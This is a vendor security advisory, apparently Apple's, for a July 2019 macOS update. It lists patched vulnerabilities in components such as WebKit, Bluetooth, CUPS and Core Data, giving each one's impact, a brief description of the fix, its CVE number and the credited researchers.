Released July 22, 2019

AppleGraphicsControl

Available for: macOS Mojave 10.14.5

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8693: Arash Tohidi of Solita

autofs

Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.5, macOS High Sierra 10.13.6

Impact: Extracting a zip file containing a symbolic link to an endpoint in an NFS mount that is attacker controlled may bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files mounted through a network share.

CVE-2019-8656: Filippo Cavallarin

Bluetooth

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-19860

Bluetooth

Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.5, macOS High Sierra 10.13.6

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

Carbon Core

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8661: Natalie Silvanovich of Google Project Zero

Core Data

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: Natalie Silvanovich of Google Project Zero

Core Data

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8660: Samuel Groß and Natalie Silvanovich of Google Project Zero

CUPS

Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.5, macOS High Sierra 10.13.6

Impact: An attacker in a privileged network position may be able to execute arbitrary code

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2019-8675: Stephan Zeisberg (github.com/stze) of Security Research Labs (srlabs.de)

CVE-2019-8696: Stephan Zeisberg (github.com/stze) of Security Research Labs (srlabs.de)

Entry added August 14, 2019, updated September 17, 2019

Disk Management

Available for: macOS Mojave 10.14.5

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2019-8539: ccpwd working with Trend Micro's Zero Day Initiative

Entry added September 17, 2019

Disk Management

Available for: macOS Mojave 10.14.5

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8697: ccpwd working with Trend Micro’s Zero Day Initiative

FaceTime

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8648: Tao Huang and Tielei Wang of Team Pangu

Found in Apps

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: This issue was addressed with improved checks.

CVE-2019-8663: Natalie Silvanovich of Google Project Zero

Game Center

Available for: macOS Mojave 10.14.5

Impact: A local user may be able to read a persistent account identifier

Description: This issue was addressed with a new entitlement.

CVE-2019-8702: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.

Entry added February 24, 2020

Grapher

Available for: macOS Mojave 10.14.5

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8695: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Graphics Drivers

Available for: macOS Mojave 10.14.5, macOS High Sierra 10.13.6

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8691: Aleksandr Tarasikov (@astarasikov), Arash Tohidi of Solita, Lilang Wu and Moony Li of Trend Micro's Mobile Security Research Team working with Trend Micro's Zero Day Initiative

CVE-2019-8692: Lilang Wu and Moony Li of Trend Micro Mobile Security Research Team working with Trend Micro's Zero Day Initiative

Entry updated July 25, 2019

Heimdal

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An issue existed in Samba that may allow attackers to perform unauthorized actions by intercepting communications between services

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team and Catalyst

IOAcceleratorFamily

Available for: macOS Mojave 10.14.5

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8694: Arash Tohidi of Solita

libxslt

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: A remote attacker may be able to view sensitive information

Description: A stack overflow was addressed with improved input validation.

CVE-2019-13118: found by OSS-Fuzz

Quick Look

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An attacker may be able to trigger a use-after-free in an application deserializing an untrusted NSDictionary

Description: This issue was addressed with improved checks.

CVE-2019-8662: Natalie Silvanovich and Samuel Groß of Google Project Zero

Safari

Available for: macOS Mojave 10.14.5

Impact: Visiting a malicious website may lead to address bar spoofing

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2019-8670: Tsubasa FUJII (@reinforchu)

Security

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8697: ccpwd working with Trend Micro’s Zero Day Initiative

sips

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8701: Simon Huang(@HuangShaomang), Rong Fan(@fanrong1992) and pjf of IceSword Lab of Qihoo 360

Entry added October 8, 2019

Siri

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: Natalie Silvanovich of Google Project Zero

Time Machine

Available for: macOS Mojave 10.14.5

Impact: The encryption status of a Time Machine backup may be incorrect

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2019-8667: Roland Kletzing of cyber:con GmbH

UIFoundation

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of document loads. This issue was addressed with improved state management.

CVE-2019-8690: Sergei Glazunov of Google Project Zero

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8649: Sergei Glazunov of Google Project Zero

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8666: Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.

CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative

CVE-2019-8671: Apple

CVE-2019-8672: Samuel Groß of Google Project Zero

CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8677: Jihui Lu of Tencent KeenLab

CVE-2019-8678: an anonymous researcher, Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan_h0) of Knownsec, Byron Wai of VX Browser Exploitation

CVE-2019-8679: Jihui Lu of Tencent KeenLab

CVE-2019-8680: Jihui Lu of Tencent KeenLab

CVE-2019-8681: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8683: lokihardt of Google Project Zero

CVE-2019-8684: lokihardt of Google Project Zero

CVE-2019-8685: akayn, Dongzhuo Zhao working with ADLab of Venustech, Ken Wong (@wwkenwong) of VXRL, Anthony Lai (@darkfloyd1014) of VXRL, and Eric Lung (@Khlung1) of VXRL

CVE-2019-8686: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8687: Apple

CVE-2019-8688: Insu Yun of SSLab at Georgia Tech

CVE-2019-8689: lokihardt of Google Project Zero